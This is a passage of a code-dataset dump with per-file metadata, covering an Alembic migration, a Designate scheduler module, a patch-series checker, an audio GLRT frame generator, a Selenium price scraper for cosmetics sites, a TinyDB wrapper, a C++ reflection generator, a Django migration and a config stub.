        sa.Column('created_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('modified_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('facId', sa.Integer(), nullable=True),
        sa.Column('year', sa.Integer(), nullable=True),
        sa.Column('againstState', sa.Integer(), nullable=False),
        sa.Column('againstStateFatal', sa.Integer(), nullable=False),
        sa.Column('againstOrg', sa.Integer(), nullable=False),
        sa.Column('againstOrgFatal', sa.Integer(), nullable=False),
        sa.Column('againstIngroup', sa.Integer(), nullable=False),
        sa.Column('againstIngroupFatal', sa.Integer(), nullable=False),
        sa.Column('againstOutgroup', sa.Integer(), nullable=False),
        sa.Column('againstOutgroupFatal', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['facId'], ['organizations.facId'], ),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_violence_facId'), 'violence', ['facId'], unique=False)
    op.create_index(op.f('ix_violence_created_at'), 'violence', ['created_at'], unique=False)
    op.create_index(op.f('ix_violence_modified_at'), 'violence', ['modified_at'], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Drop everything created by upgrade(), children (violence,
    nonviolence) before parents (organizations, groups) to satisfy the
    foreign keys."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_violence_modified_at'), table_name='violence')
    op.drop_index(op.f('ix_violence_created_at'), table_name='violence')
    op.drop_index(op.f('ix_violence_facId'), table_name='violence')
    op.drop_table('violence')
    op.drop_index(op.f('ix_nonviolence_modified_at'), table_name='nonviolence')
    op.drop_index(op.f('ix_nonviolence_created_at'), table_name='nonviolence')
    op.drop_index(op.f('ix_nonviolence_facId'), table_name='nonviolence')
    op.drop_table('nonviolence')
    op.drop_index(op.f('ix_organizations_modified_at'), table_name='organizations')
    op.drop_index(op.f('ix_organizations_created_at'), table_name='organizations')
    op.drop_table('organizations')
    op.drop_index(op.f('ix_user_token'), table_name='user')
    op.drop_index(op.f('ix_user_name'), table_name='user')
    op.drop_index(op.f('ix_user_modified_at'), table_name='user')
    op.drop_index(op.f('ix_user_created_at'), table_name='user')
    op.drop_table('user')
    op.drop_index(op.f('ix_groups_modified_at'), table_name='groups')
    op.drop_index(op.f('ix_groups_created_at'), table_name='groups')
    op.drop_index(op.f('ix_groups_groupName'), table_name='groups')
    op.drop_table('groups')
    # ### end Alembic commands ###
| 52.030534
| 105
| 0.702171
|
4a04e38beb9bcefe3a2685a219769dc9a94c54da
| 1,017
|
py
|
Python
|
designate/scheduler/__init__.py
|
ISCAS-VDI/designate-base
|
bd945607e3345fbef8645c3441e96b032b70b098
|
[
"Apache-2.0"
] | null | null | null |
designate/scheduler/__init__.py
|
ISCAS-VDI/designate-base
|
bd945607e3345fbef8645c3441e96b032b70b098
|
[
"Apache-2.0"
] | null | null | null |
designate/scheduler/__init__.py
|
ISCAS-VDI/designate-base
|
bd945607e3345fbef8645c3441e96b032b70b098
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from designate.scheduler.base import Scheduler
LOG = logging.getLogger(__name__)
# Register this module's options under the [service:central] config group
# at import time so they are available before get_scheduler is called.
cfg.CONF.register_opts([
    cfg.ListOpt(
        'scheduler_filters',
        default=['default_pool'],
        help='Enabled Pool Scheduling filters'),
], group='service:central')
def get_scheduler(storage):
    """Build a Scheduler bound to the given storage backend."""
    return Scheduler(storage=storage)
| 30.818182
| 75
| 0.751229
|
4a04e3a33b3983b23a06a7127a91a499cf37f0bf
| 4,355
|
py
|
Python
|
devutils/check_patch_files.py
|
InternetGoddessShinatama/Manamoon
|
abfdd8f247497cda2a57a8dbc93f6193c4b8345b
|
[
"BSD-3-Clause"
] | null | null | null |
devutils/check_patch_files.py
|
InternetGoddessShinatama/Manamoon
|
abfdd8f247497cda2a57a8dbc93f6193c4b8345b
|
[
"BSD-3-Clause"
] | null | null | null |
devutils/check_patch_files.py
|
InternetGoddessShinatama/Manamoon
|
abfdd8f247497cda2a57a8dbc93f6193c4b8345b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Copyright (c) 2020 Saint Corp. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run sanity checking algorithms over Manamoon's patch files
It checks the following:
* All patches exist
* All patches are referenced by the patch order
Exit codes:
* 0 if no problems detected
* 1 if warnings or errors occur
"""
import argparse
import sys
from pathlib import Path
from third_party import unidiff
sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils'))
from _common import ENCODING, get_logger, parse_series
sys.path.pop(0)
# File suffixes to ignore for checking unused patches
_PATCHES_IGNORE_SUFFIXES = {'.md'}
def _read_series_file(patches_dir, series_file, join_dir=False):
    """Yield the entries of a quilt-style series file.

    patches_dir is a pathlib.Path to the directory of patches.
    series_file is a pathlib.Path relative to patches_dir.
    When join_dir is True, each entry is yielded as a path joined under
    patches_dir; otherwise the raw entry string is yielded.
    """
    series_entries = parse_series(patches_dir / series_file)
    if join_dir:
        yield from (patches_dir / entry for entry in series_entries)
    else:
        yield from series_entries
def check_patch_readability(patches_dir, series_path=Path('series')):
    """Verify every patch listed in the series file exists and parses as
    a unified diff.

    Missing or unparsable patches are logged to stdout.
    Returns True if warnings occurred, False otherwise.
    """
    had_warnings = False
    for patch_path in _read_series_file(patches_dir, series_path, join_dir=True):
        if not patch_path.exists():
            get_logger().warning('Patch not found: %s', patch_path)
            had_warnings = True
            continue
        with patch_path.open(encoding=ENCODING) as file_obj:
            try:
                unidiff.PatchSet(file_obj.read())
            except unidiff.errors.UnidiffParseError:
                get_logger().exception('Could not parse patch: %s', patch_path)
                had_warnings = True
    return had_warnings
def check_unused_patches(patches_dir, series_path=Path('series')):
    """Check for patch files under patches_dir never referenced by the
    series file.

    patches_dir is a pathlib.Path to the directory of patches.
    series_path is a pathlib.Path to the series file relative to patches_dir.
    Unused patches are logged to stdout.
    Returns True if there are unused patches; False otherwise.
    """
    unused_patches = set()
    for path in patches_dir.rglob('*'):
        if path.is_dir():
            continue
        # Documentation files next to patches don't need series entries.
        if path.suffix in _PATCHES_IGNORE_SUFFIXES:
            continue
        unused_patches.add(str(path.relative_to(patches_dir)))
    unused_patches -= set(_read_series_file(patches_dir, series_path))
    # Robustness fix: use discard instead of remove so a missing series
    # entry (e.g. if the series file was filtered out above) doesn't raise
    # KeyError and mask the real report.
    unused_patches.discard(str(series_path))
    logger = get_logger()
    for entry in sorted(unused_patches):
        logger.warning('Unused patch: %s', entry)
    return bool(unused_patches)
def check_series_duplicates(patches_dir, series_path=Path('series')):
    """Report whether any entry appears more than once in the series file.

    series_path is a pathlib.Path to the series file relative to patches_dir.
    Returns True as soon as a duplicate is found; False otherwise.
    """
    seen = set()
    for entry in _read_series_file(patches_dir, series_path):
        if entry in seen:
            get_logger().warning('Patch appears more than once in series: %s', entry)
            return True
        seen.add(entry)
    return False
def main():
    """CLI entrypoint: run all patch checks and exit non-zero on warnings."""
    root_dir = Path(__file__).resolve().parent.parent
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument(
        '-p',
        '--patches',
        type=Path,
        default=root_dir / 'patches',
        help='Path to the patches directory to use. Default: %(default)s')
    args = parser.parse_args()
    # The list literal forces every check to run, matching the |= chain.
    had_warnings = any([
        check_patch_readability(args.patches),
        check_series_duplicates(args.patches),
        check_unused_patches(args.patches),
    ])
    exit(1 if had_warnings else 0)
# Invoke the CLI entrypoint when run as a script (not on import).
if __name__ == '__main__':
    main()
| 30.886525
| 85
| 0.679679
|
4a04e449f927196d2489985bf8319d6c891853bb
| 4,126
|
py
|
Python
|
video_generator.py
|
ArthurFDLR/SwainsonsThrush-detector
|
ce304ffc580380887261af30a02d1fc5ad231aba
|
[
"MIT"
] | null | null | null |
video_generator.py
|
ArthurFDLR/SwainsonsThrush-detector
|
ce304ffc580380887261af30a02d1fc5ad231aba
|
[
"MIT"
] | null | null | null |
video_generator.py
|
ArthurFDLR/SwainsonsThrush-detector
|
ce304ffc580380887261af30a02d1fc5ad231aba
|
[
"MIT"
] | null | null | null |
import scipy.io.wavfile
import scipy.signal
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import pathlib
import os
CURRENT_PATH = pathlib.Path(__file__).parent.absolute()
def ln_GLRT(s_array:np.ndarray, x_array:np.ndarray) -> np.ndarray:
    """ Compute the value of natural logarithm of the generalized likelihood ratio along the signal x_array using the template s_array.

    Args:
        s_array (np.ndarray): Template to detect (1-D)
        x_array (np.ndarray): Signal to analyze (1-D)

    Returns:
        np.ndarray: Natural logarithm of the generalized likelihood ratio test,
        one value per window start (length = len(x_array) - len(s_array))
    """
    assert s_array.ndim == x_array.ndim == 1
    N = s_array.shape[0]
    GLRT_out = []
    print('\n## Generalized Likelihood Ration Computation ##')
    for n_0 in tqdm(range(x_array.shape[0] - N)):
        # Window of the signal aligned with the template.
        x_array_truncate = x_array[n_0:n_0+N]
        # MLE of the template amplitude under H1 (least-squares projection of x onto s).
        A_MLE = np.sum(np.multiply(s_array,x_array_truncate)) / np.sum(np.square(s_array))
        # Noise-variance MLEs under H0 (no template) and H1 (template removed).
        sigma2_0_MLE = np.average(np.square(x_array_truncate))
        sigma2_1_MLE = np.average(np.square(x_array_truncate - (A_MLE * s_array)))
        # NOTE(review): an all-zero window makes np.log return -inf/NaN -- confirm inputs.
        GLRT_out.append( (N/2.0) * (np.log(sigma2_0_MLE) - np.log(sigma2_1_MLE)) )
    return np.array(GLRT_out)
def create_video(template_URL:pathlib.Path, signal_URL:pathlib.Path, frame_rate:int, name:str):
    """ Generate a sequence of frames to visualize the evolution of the generalized likelihood ratio in real-time.
    The user can overlay the image sequence on the video from which the signal comes from.

    Frames are written to ./video/python_export/<name>/<name>_<i>.png.

    Args:
        template_URL (pathlib.Path): Path to the audio file (.wav) used as template for the computation of the generalized likelihood ratio
        signal_URL (pathlib.Path): Path to the audio file (.wav) used as signal for the computation of the generalized likelihood ratio
        frame_rate (int): Number of frames generated per second of audio file
        name (str): Name of the image sequence
    """
    saving_path = CURRENT_PATH / 'video' / 'python_export'
    assert saving_path.exists()
    assert template_URL.is_file()
    assert signal_URL.is_file()

    # Read wav files; both must share one sample rate for the GLRT to be meaningful.
    template_samplerate, template_WAV = scipy.io.wavfile.read(template_URL)
    signal_samplerate, signal_WAV = scipy.io.wavfile.read(signal_URL)
    assert template_samplerate == signal_samplerate

    signal_size = signal_WAV.shape[0]
    signal_min = signal_WAV.min()
    signal_max = signal_WAV.max()

    # Likelihood ratio along the whole signal.
    signal_lnGLRT = ln_GLRT(template_WAV, signal_WAV)
    signal_lnGLRT_size = signal_lnGLRT.shape[0]
    signal_lnGLRT_max = signal_lnGLRT.max()

    # Initialize the figure once and redraw it for every frame.
    fig, ax = plt.subplots(figsize=(10,4))
    ax_bis = ax.twinx()
    fig.subplots_adjust(left=0.1, right=0.9, top=0.9, bottom=0.1)

    # One frame every (samplerate / frame_rate) samples.
    timestamps = np.arange(0, signal_lnGLRT_size, int(signal_samplerate/frame_rate))
    saving_path /= name
    # Fix: exist_ok avoids the check-then-create race of exists() + os.mkdir().
    saving_path.mkdir(exist_ok=True)
    print('\n## Frames generation ##')
    for i in tqdm(range(timestamps.shape[0])):
        t = timestamps[i]
        ax.clear()
        ax_bis.clear()
        ax.axis('off')
        ax_bis.axis('off')
        ax_bis.set_xlim(0, signal_size)
        ax_bis.set_ylim(0, signal_lnGLRT_max)
        ax.set_xlim(0, signal_size)
        ax.set_ylim(signal_min, signal_max*2)
        ax.plot(signal_WAV[:t], color='grey', alpha=.7, linewidth=.5)
        ax_bis.plot(signal_lnGLRT[:t], color='#9500ff', linewidth=1.)
        fig.savefig(saving_path / (name + '_{}.png'.format(i)), transparent=True, dpi=192, pad_inches=0.)
# Script entry point: render the GLRT overlay frames for one sample clip.
if __name__ == "__main__":
    plt.style.use('ggplot')
    template_path = CURRENT_PATH / 'audio_files' / 'template' / 'call_2.wav'
    signal_path = CURRENT_PATH / 'audio_files' / 'signals' / 'nature_1.wav'
    create_video(template_path, signal_path, 30, 'nature1_call2')
| 35.878261
| 139
| 0.692923
|
4a04e483f58b592b661388a28fd37bb8827f6846
| 4,551
|
py
|
Python
|
Main.py
|
syzadele/CosmeticScanner
|
4834977b7b54a17324b88513cff84c3d6f6ff63e
|
[
"Apache-2.0"
] | null | null | null |
Main.py
|
syzadele/CosmeticScanner
|
4834977b7b54a17324b88513cff84c3d6f6ff63e
|
[
"Apache-2.0"
] | null | null | null |
Main.py
|
syzadele/CosmeticScanner
|
4834977b7b54a17324b88513cff84c3d6f6ff63e
|
[
"Apache-2.0"
] | null | null | null |
import requests
import codecs
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from email.mime import image
from test.test_email import openfile
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def getWebPage(productName):
    """Log in to sephora.fr with Selenium and return the search-results page HTML.

    Returns UTF-8 encoded bytes -- NOTE(review): unlike getWebPageM/getWebPageN,
    which return str; confirm callers expect bytes here.
    """
    # NOTE(review): find_element_by_* was removed in Selenium 4; this module
    # appears to target Selenium 3.
    # Open login page
    driver = webdriver.Chrome()
    driver.get("https://www.sephora.fr/secure/user/login.jsp")
    # Check title
    assert "Sephora" in driver.title
    # Fill login and password, then log in.
    # Credentials live in the local (untracked) InfoLogin module.
    import InfoLogin
    element = driver.find_element_by_id("cmail")
    element.send_keys(InfoLogin.SEPHORA_LOGIN)
    element = driver.find_element_by_id("cpasse")
    element.send_keys(InfoLogin.SEPHORA_PW)
    element.send_keys(Keys.RETURN)
    # Fill the search bar and submit.
    element = driver.find_element_by_id("champRecherche")
    element.send_keys(productName)
    element.send_keys(Keys.RETURN)
    htmlSource = (driver.page_source).encode('utf-8')
    return htmlSource
def getWebPageM(productName):
    """Log in to marionnaud.fr with Selenium and return the search-results page HTML (str)."""
    # NOTE(review): find_element_by_* was removed in Selenium 4; this module
    # appears to target Selenium 3.
    # Open login page
    driver = webdriver.Chrome()
    driver.get("https://www.marionnaud.fr/login")
    # Check title
    assert "Login" in driver.title
    # Fill login and password, then log in.
    import InfoLogin
    element = driver.find_element_by_id("j_username")
    element.send_keys(InfoLogin.MARIONNAUD_LOGIN)
    element = driver.find_element_by_id("j_password")
    element.send_keys(InfoLogin.MARIONNAUD_PW)
    element.send_keys(Keys.RETURN)
    # Fill the search bar and submit.
    element = driver.find_element_by_name("text")
    element.send_keys(productName)
    element.send_keys(Keys.RETURN)
    htmlSource = driver.page_source
    return htmlSource
def getWebPageN(productName):
    """Log in to nocibe.fr with Selenium and return the search-results page HTML (str)."""
    # NOTE(review): find_element_by_* was removed in Selenium 4; this module
    # appears to target Selenium 3.
    # Open login page
    driver = webdriver.Chrome()
    driver.get("https://www.nocibe.fr/nocibe/CustomerConnection?StoreID=1&CatalogueID=1&LangueID=1")
    print(driver.title)
    # Check title
    assert "Nocibé" in driver.title
    # Fill login and password, then log in.
    import InfoLogin
    element = driver.find_element_by_xpath("//div[@id='identification-user']//input[@id='email']")
    element.send_keys(InfoLogin.NOCIBE_LOGIN)
    element = driver.find_element_by_id("mdp1")
    element.send_keys(InfoLogin.NOCIBE_PW)
    element.send_keys(Keys.RETURN)
    # Wait until the account menu is rendered before touching the search bar.
    wait = WebDriverWait(driver, 10)
    wait.until(EC.visibility_of_element_located((By.XPATH, "//div[@class='col-xs-3']/div[@class='menu-compte mb-20 mt-25']")))
    element = driver.find_element_by_id("Rechercher")
    element.click()
    element.send_keys(productName)
    element.send_keys(Keys.RETURN)
    htmlSource = driver.page_source
    return htmlSource
def openFile(path):
    """Read a UTF-8 encoded text file and return its contents as str."""
    with codecs.open(path, 'r', 'utf-8') as source:
        return source.read()
def getPrice(content):
    """Parse Sephora search-result HTML into (rank, image URL, label, price) tuples.

    Returns at most 6 entries, ranked starting at 1.
    Fix: removed the leftover debug print of every parsed product;
    insert(i, ...) on a growing list is equivalent to append and clearer as such.
    """
    results = []
    soup = BeautifulSoup(content, "lxml")
    for rank, product in enumerate(
            soup.find_all(attrs={'class': 'searchClassique'}, limit=6), start=1):
        libelle = product.find("p", class_="libelle").text
        price = product.find("p", class_="prix").text
        image = product.find("img", {"class": "lazy"})
        results.append((rank, image['src'], libelle, price))
    return results
def getPriceM(content):
    """Parse Marionnaud search-result HTML into (rank, image URL, label, price) tuples (max 6)."""
    results = []
    soup = BeautifulSoup(content, "lxml")
    products = soup.find_all(attrs={'class': 'col-lg-3 col-md-3 col-sm-4'}, limit=6)
    for rank, product in enumerate(products, start=1):
        label = product.find("div", class_="product_name").text
        price = product.find("div", class_="price").text
        image = product.find("div", {"class": "product_img"})
        results.append((rank, image.img['src'], label, price))
    return results
def getPriceN(content):
    """Parse Nocibé search-result HTML into (rank, image URL, label, price) tuples (max 6)."""
    results = []
    soup = BeautifulSoup(content, "lxml")
    products = soup.find_all(attrs={"class": "pl_produit pl_produit--lowline col-xs-3"}, limit=6)
    for rank, product in enumerate(products, start=1):
        label = product.find("div", class_="pl_accroche").text
        price = product.find("div", class_="pl_prix").text
        image = product.find("div", class_="pl_image")
        results.append((rank, image.a.img['src'], label, price))
    return results
| 33.218978
| 126
| 0.686662
|
4a04e4c0c840fcec22a61a45d6570509cd073978
| 2,438
|
py
|
Python
|
octo_train/db/tinydbdatabase.py
|
dankondr/octo-train
|
3d1b38b498b3f551bff33410d64ffebc387b9e0f
|
[
"MIT"
] | 2
|
2020-04-09T17:16:16.000Z
|
2020-04-10T00:16:18.000Z
|
octo_train/db/tinydbdatabase.py
|
dankondr/octo-train
|
3d1b38b498b3f551bff33410d64ffebc387b9e0f
|
[
"MIT"
] | null | null | null |
octo_train/db/tinydbdatabase.py
|
dankondr/octo-train
|
3d1b38b498b3f551bff33410d64ffebc387b9e0f
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from random import randint
from tinydb import TinyDB, where
from octo_train.db.database_interface import IDatabase
class TinyDBDatabase(IDatabase):
    """TinyDB-backed persistence for the user and practice-problem records.

    Records containing a 'name' key represent the (single) user; records with
    a 'link' key represent problems, tagged with problem_type/solved/date.
    Fix: the identical search-and-collect loops of get_solved/get_not_solved/
    get_all are factored into the _links() helper.
    """

    # Date format used to stamp problem records, e.g. '05.04.20'.
    _DATE_FORMAT = '%d.%m.%y'

    def __init__(self, path_to_db):
        """Open (or create) the TinyDB file and load the stored user, if any."""
        self.db = TinyDB(path_to_db)
        self.user = None
        self.loaded = False
        if self.db.contains(where('name')):
            self.loaded = True
            self.user = self._get_user()

    def new_user(self, **kwargs):
        """Persist a new user record and cache it on the instance."""
        self.db.insert(kwargs)
        self.user = self._get_user()

    def get_stats(self):
        """Not implemented yet (kept for IDatabase compatibility)."""
        pass

    def solved_today(self, problem_type):
        """Return how many problems of problem_type were solved today."""
        today = self._get_today_date()
        solved = self.db.search((where('date') == today)
                                & (where('problem_type') == problem_type)
                                & (where('solved') == True))  # noqa: E712 - tinydb query syntax
        return len(solved)

    def _links(self, condition):
        """Return the set of 'link' values of the records matching condition."""
        return {item['link'] for item in self.db.search(condition)}

    def get_solved(self, problem_type):
        """Links of solved problems of the given type."""
        return self._links((where('problem_type') == problem_type)
                           & (where('solved') == True))  # noqa: E712

    def get_not_solved(self, problem_type):
        """Links of not-yet-solved problems of the given type."""
        return self._links((where('problem_type') == problem_type)
                           & (where('solved') == False))  # noqa: E712

    def get_all(self, problem_type):
        """Links of all problems of the given type."""
        return self._links(where('problem_type') == problem_type)

    def get_not_solved_problem(self, problem_type):
        """Pop and return a random unsolved problem record, or None if none exist."""
        candidates = self.db.search((where('problem_type') == problem_type)
                                    & (where('solved') == False))  # noqa: E712
        if not candidates:
            return None
        problem = candidates[randint(0, len(candidates) - 1)]
        # The record is removed here; callers re-store it via insert().
        self.db.remove(where('link') == problem['link'])
        return problem

    def insert(self, problem_data):
        """Store a problem record, stamping it with today's date."""
        problem_data['date'] = self._get_today_date()
        self.db.insert(problem_data)

    def update_user(self, key, value):
        """Update one field of the cached user record and write it back."""
        self.user[key] = value
        self.db.write_back([self.user])

    def _get_user(self):
        """Return the stored user record; propagates IndexError if absent."""
        # The presence of a 'name' key identifies the user record.
        return self.db.search(where('name'))[0]

    def _get_today_date(self):
        """Today's date formatted with _DATE_FORMAT."""
        return datetime.now().strftime(self._DATE_FORMAT)
| 30.098765
| 96
| 0.578753
|
4a04e4cc59a680365e1cc183628b5134ba211ccb
| 2,532
|
py
|
Python
|
code/Access_delta.py
|
rodrigoms95/herramientas-climatico-22-1
|
a85a941e6680637b7b595ad534ce6775328707c8
|
[
"BSD-3-Clause"
] | null | null | null |
code/Access_delta.py
|
rodrigoms95/herramientas-climatico-22-1
|
a85a941e6680637b7b595ad534ce6775328707c8
|
[
"BSD-3-Clause"
] | null | null | null |
code/Access_delta.py
|
rodrigoms95/herramientas-climatico-22-1
|
a85a941e6680637b7b595ad534ce6775328707c8
|
[
"BSD-3-Clause"
] | null | null | null |
# Computes the temperature delta between the 1970-2000 and 2020-2040
# periods using data from the ACCESS model.
import os
import xarray as xr
modelo = "Access"
path_d= os.getcwd() + "/datos/" + modelo + "/"
path_r = os.getcwd() + "/resultados/" + modelo + "/"
name = ["tas_Amon_ACCESS1-0_historical_r1i1p1_185001-200512.nc",
    "tas_Amon_ACCESS1-0_rcp85_r1i1p1_200601-210012.nc",
    "hist", "proy", "delta"]
# Create the results folder if it does not exist.
if not os.path.exists(path_r):
    os.mkdir(path_r)
# Start and end year of each climatology, inclusive, read from the
# 'periodos' file (historical first, then projection).
with open(os.getcwd() + "/resultados/periodos", "r") as f:
    yr_i = [f.readline()[:-1]]
    yr_f = [f.readline()[:-1]]
    yr_i.append(f.readline()[:-1])
    yr_f.append(f.readline()[:-1])
ds = []
vars = ["height", "time_bnds", "lat_bnds", "lon_bnds"]
# Open the historical file first, then the projection.
for i in range(0, 2):
    ds.append(xr.load_dataset(
        path_d + name[i]).drop(vars))
    # Select the desired period.
    ds[i] = ds[i].sel(time = slice(yr_i[i], yr_f[i]))
    # Compute the monthly-mean climatology.
    ds[i] = ds[i].groupby("time.month").mean()
    # Shift longitude values into the (-180, 180) range.
    ds[i]["lon_ajus"] = xr.where(
        ds[i]["lon"] > 180,
        ds[i]["lon"] - 360,
        ds[i]["lon"])
    # Make the adjusted longitude the main dimension and reorder the data.
    ds[i] = (ds[i]
        .swap_dims(lon = "lon_ajus")
        .sel(lon_ajus = sorted(ds[i].lon_ajus))
        .drop("lon"))
    ds[i] = ds[i].rename(lon_ajus = "lon")
    # Save the netCDF file.
    ds[i].to_netcdf(
        path_r + "Access_clim_" + name[i + 2]
        + "_" + str(yr_i[i]) + "_" + str(yr_f[i])
        + "_monthly.nc"
        )
i = 2
# Compute the delta as projected minus historical climatology.
ds.append(ds[1] - ds[0])
# Shift longitude values into the (-180, 180) range.
ds[i]["lon_ajus"] = xr.where(
    ds[i]["lon"] > 180,
    ds[i]["lon"] - 360,
    ds[i]["lon"])
# Make the adjusted longitude the main dimension and reorder the data.
ds[i] = (ds[i]
    .swap_dims(lon = "lon_ajus")
    .sel(lon_ajus = sorted(ds[i].lon_ajus))
    .drop("lon"))
ds[i] = ds[i].rename(lon_ajus = "lon")
# Save the netCDF file.
ds[i].to_netcdf(
    path_r + modelo + "_" + name[i + 2] + "_"
    + str(yr_i[0]) + "_" + str(yr_f[0]) + "_"
    + str(yr_i[1]) + "_" + str(yr_f[1])+
    "_monthly.nc"
    )
| 26.93617
| 64
| 0.593602
|
4a04e6d400c8fde598373ba480fcda1be2f82463
| 2,304
|
py
|
Python
|
source/Library/reflection/Reflection.py
|
JarrettWendt/FIEAEngine
|
0bf7e89cd66fec29550f7d7a1a11f5cf398c27e5
|
[
"MIT"
] | 2
|
2020-05-27T14:01:39.000Z
|
2022-03-21T09:11:58.000Z
|
source/Library/reflection/Reflection.py
|
JarrettWendt/FIEAEngine
|
0bf7e89cd66fec29550f7d7a1a11f5cf398c27e5
|
[
"MIT"
] | null | null | null |
source/Library/reflection/Reflection.py
|
JarrettWendt/FIEAEngine
|
0bf7e89cd66fec29550f7d7a1a11f5cf398c27e5
|
[
"MIT"
] | null | null | null |
import os, sys
from pathlib import Path
# TODO:
# Don't assume the filename is the class name.
# Do some syntax checking with the KEYWORDS instead of just ignoring them.
# Come up with a cleaner way to encode the indentation, perhaps at the cost of double-parsing the string.
# Use a library for real C++ parsing.
# Make this work for nested types and for when the namespace declaration isn't all on one line.
def isCommentedOut(line):
    """Return True when the stripped line starts a '//' or '/*' C++-style comment."""
    stripped = line.lstrip()
    return stripped.startswith(('//', '/*'))
class ClassInfo:
    """Metadata needed to register one reflectable C++ class."""

    def __init__(self, path=''):
        self.namespace = ''
        self.path = path
        self.className = ''

    def scopeResolvedClass(self):
        """Return the scope-resolved class name. Ex: 'MyNamespace::MyClass'."""
        return '{}::{}'.format(self.namespace, self.className)

    def __str__(self):
        # Renders one entry of the generated C++ constructor map.
        return '{{ "{0}", [] {{ return std::make_shared<{1}>(); }} }}'.format(
            self.className, self.scopeResolvedClass())
# Scan the given roots (default: parent directory) for headers containing
# [[Reflectable]] classes and generate the C++ registration file.
rootPaths = [os.path.abspath(arg) for arg in sys.argv[1:]] if len(sys.argv) > 1 else [os.path.abspath('..')]
destFile = rootPaths[0] + '/.generated/Reflection.generated.cpp'
print("Generating Reflectables under paths " + str(rootPaths))
print("Will export to " + str(destFile))
classInfos = []
# Recursively go through all header files.
for rootPath in rootPaths:
    for extension in ['*.h', "*.hh", "*.hpp"]:
        for path in Path(rootPath).rglob(extension):
            with open(path, 'r') as file:
                classInfo = ClassInfo(path)
                for line in file:
                    # NOTE(review): assumes the namespace declaration fits on
                    # one line; nested namespaces are not handled (see TODO).
                    if 'namespace' in line :
                        classInfo.namespace = line.split()[-1]
                    if not isCommentedOut(line):
                        if '[[Reflectable]]' in line:
                            try:
                                # The class name is taken as the second token of
                                # the line that follows the attribute.
                                classInfo.className = next(file).split()[1]
                                classInfos.append(classInfo)
                            except Exception:
                                pass
# Finally, generate the string we'll write to the file.
string = """#include "pch.h"
#include "Reflection.h"
"""
for classInfo in classInfos:
    string += '#include "' + classInfo.path.as_posix() + '"\n'
string += """
namespace Library
{
	const HashMap<std::string, std::function<std::shared_ptr<void>()>> Reflection::constructors =
	{
"""
for classInfo in classInfos:
    string += '\t\t' + str(classInfo) + ',\n'
string += """	};
}
"""
with open(destFile, 'w') as file:
    file.write(string)
    file.close()  # redundant: the with-block already closes the file
| 28.097561
| 109
| 0.670139
|
4a04e7734422842189da8d7db232303546d54d5a
| 788
|
py
|
Python
|
account/migrations/0008_auto_20200415_1840.py
|
TolimanStaR/Course-Work
|
79dbfcbaef0ae79209295fe8d36b6fd9610e99b8
|
[
"MIT"
] | 1
|
2020-03-31T22:09:34.000Z
|
2020-03-31T22:09:34.000Z
|
account/migrations/0008_auto_20200415_1840.py
|
TolimanStaR/Course-Work
|
79dbfcbaef0ae79209295fe8d36b6fd9610e99b8
|
[
"MIT"
] | 8
|
2021-03-30T14:20:10.000Z
|
2022-03-12T00:52:03.000Z
|
account/migrations/0008_auto_20200415_1840.py
|
TolimanStaR/Course-Work
|
79dbfcbaef0ae79209295fe8d36b6fd9610e99b8
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.9 on 2020-04-15 15:40
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: redefines the choices of userprofile.contest_rang.

    Choices are (stored value, human-readable label) pairs; max_length=45.
    """

    dependencies = [
        ('account', '0007_auto_20200415_1707'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userprofile',
            name='contest_rang',
            field=models.CharField(choices=[('Новичек', 'Новичек'), ('Лиманадек', 'Лиманадек'), ('Черниговский батон', 'Черниговский батон'), ('Сыр косичка', 'Сыр косичка'), ('Масленок', 'Масленок'), ("Советский for'ик", "Советский for'ик"), ('Живой огурец', 'Живой огурец'), ('Мафиозник', 'Мафиозник'), ('Олимпиадник', 'Олимпиадник'), ('Sensei', 'Sensei'), ('Галактический кодер', 'Галактический кодер')], default='Новичек', max_length=45),
        ),
    ]
| 41.473684
| 441
| 0.638325
|
4a04e81bc52758d3933b202384d7b24cac6607be
| 267
|
py
|
Python
|
config.py
|
parshnt/gclass-bot
|
d0ce5fe48fccb7c481b18d06e111c623bfe37e67
|
[
"MIT"
] | 2
|
2021-08-24T19:26:51.000Z
|
2022-03-04T12:21:34.000Z
|
config.py
|
parshnt/gclass-bot
|
d0ce5fe48fccb7c481b18d06e111c623bfe37e67
|
[
"MIT"
] | null | null | null |
config.py
|
parshnt/gclass-bot
|
d0ce5fe48fccb7c481b18d06e111c623bfe37e67
|
[
"MIT"
] | null | null | null |
# Email and password of the Google account used to join the meeting.
PASS = ""
EMAIL = ""
# URL of the Google Classroom / Google Meet session to join.
CLASSROOM_URL = ""
# If the number of people in the meeting drops below this value, the bot
# leaves the meeting automatically. Keep it 0 to disable this feature.
THRESHOLD_PEOPLE = 0
| 24.272727
| 88
| 0.719101
|
4a04e8b6ed2a66e7acd5bdfca9acd9dfed4a036b
| 1,749
|
py
|
Python
|
python/openradar/db.py
|
manicmaniac/openradar
|
